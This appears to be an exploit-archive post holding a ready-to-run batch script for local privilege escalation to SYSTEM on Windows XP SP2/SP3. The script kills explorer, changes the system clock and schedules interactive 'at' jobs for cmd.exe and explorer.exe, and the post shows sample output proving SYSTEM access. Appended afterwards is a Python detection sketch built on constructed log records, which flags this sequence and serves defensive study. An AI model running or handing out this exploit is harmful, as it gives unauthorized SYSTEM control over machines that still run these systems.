# Microsoft WinXP sp2/sp3 local system privilege escalation exploit
#
# Platform: Windows XP SP2/SP3
# Type: local
# Exploit Author: Todor Donev [todor.donev][@][gmail.com]
#
# Good luck and Have fun!!
# Kind regards to so sweet baby Tsvetelina Emirska
# Thank you Lina and thanks that all my friends are beside
# me and support me every time.
#
# Description:
#
# Copy the batch code into a new file with a .cmd or .bat extension,
# then start it, wait a few seconds and press any key!
# This exploit kills explorer, then uses "at" to execute
# explorer.exe and cmd.exe and change your profile with System user privilege.
#
#
#
# Use whoami.exe to check your user privileges.
# Download:
#
# http://www.microsoft.com/downloads/en/details.aspx?FamilyID=3E89879D-6C0B-4F92-96C4-1016C187D429
#
#
# !! USE AT YOUR 0WN RISK !!
# !! ONLY FOR EDUCATIONAL PURPOSE !!
#
# [+] Microsoft WinXP sp2/sp3 local system privilege escalation exploit
#
# Added a new job with job ID = 1
# Added a new job with job ID = 2
# Added a new job with job ID = 3
# Added a new job with job ID = 4
# Added a new job with job ID = 5
# Added a new job with job ID = 6
# Added a new job with job ID = 7
# Added a new job with job ID = 8
# Added a new job with job ID = 9
# Added a new job with job ID = 10
# Added a new job with job ID = 11
# Added a new job with job ID = 12
# [*] Backup time
# The current time is: 13:36:57,67
# Enter the new time: 13:44
#
# C:\WINDOWS\system32>whoami
# NT AUTHORITY\SYSTEM
#
############## CUT HERE ###########################
@echo off
echo [+] Microsoft WinXP sp2/sp3 local system privilege escalation exploit
start time /T > time.txt
tskill explorer
time 13:36:59 > nul
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
cls
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
cls
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
cls
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
echo [*] Backup time
time < time.txt
############## CUT HERE ###########################
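#
# Detection sketch for the sequence described above, added here as an example; it is not
# part of the original exploit or the author's code. The "<timestamp> <user> <command line>"
# record format and all sample records are constructed assumptions.

```python
import re

# at [\\host] HH:MM [/options ...] command; options are captured to look for /interactive
AT_JOB = re.compile(r"^at(?:\.exe)?\s+(?:\\\\\S+\s+)?\d{1,2}:\d{2}\b"
                    r"(?P<opts>(?:\s+/\S+)*)\s+(?P<target>.+)$", re.I)
CLOCK_SET = re.compile(r"^time(?:\.exe)?\s+\d{1,2}:\d{2}", re.I)  # "time /T" only displays
SHELL_KILL = re.compile(r"^(?:tskill|taskkill)\b.*\bexplorer", re.I)

# Constructed records "<timestamp> <user> <command line>"; not a real Windows log format.
SAMPLE = """\
2011-01-10T09:00:01 alice cmd.exe /c time /T
2011-01-10T09:05:00 alice at 23:00 backup.cmd
2011-01-10T13:36:57 bob tskill explorer
2011-01-10T13:36:59 bob time 13:36:59
2011-01-10T13:36:59 bob at 13:37 /interactive cmd.exe
2011-01-10T13:36:59 bob at 13:37 /interactive explorer.exe
2011-01-10T13:36:59 bob at 13:37 /interactive at /del /y
2011-01-11T10:00:00 carol at 10:05 /interactive notepad.exe
"""

def detect(text, window=10):
    """Flag interactive at jobs; correlate by record order because the clock is tampered with."""
    recent, findings = {}, []
    for n, line in enumerate(text.splitlines()):
        if not line.strip():
            continue
        _ts, user, cmd = line.split(" ", 2)
        seen = recent.setdefault(user, {})
        if CLOCK_SET.match(cmd):
            seen["clock_set"] = n
        elif SHELL_KILL.match(cmd):
            seen["shell_kill"] = n
        else:
            job = AT_JOB.match(cmd)
            if job and "/interactive" in job.group("opts").lower():
                context = sorted(k for k, i in seen.items() if n - i <= window)
                findings.append({"line": n + 1, "user": user,
                                 "target": job.group("target").strip(), "context": context,
                                 "severity": "high" if "clock_set" in context else "medium"})
    return findings

if __name__ == "__main__":
    for finding in detect(SAMPLE):
        print(finding)
```

# Records are correlated by position rather than by timestamp because the batch file sets
# the system clock before scheduling its jobs, so time-window matching is unreliable.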